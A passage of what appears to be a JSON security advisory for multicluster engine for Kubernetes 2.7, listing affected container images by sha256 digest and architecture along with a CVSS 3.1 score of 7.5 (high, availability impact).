"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
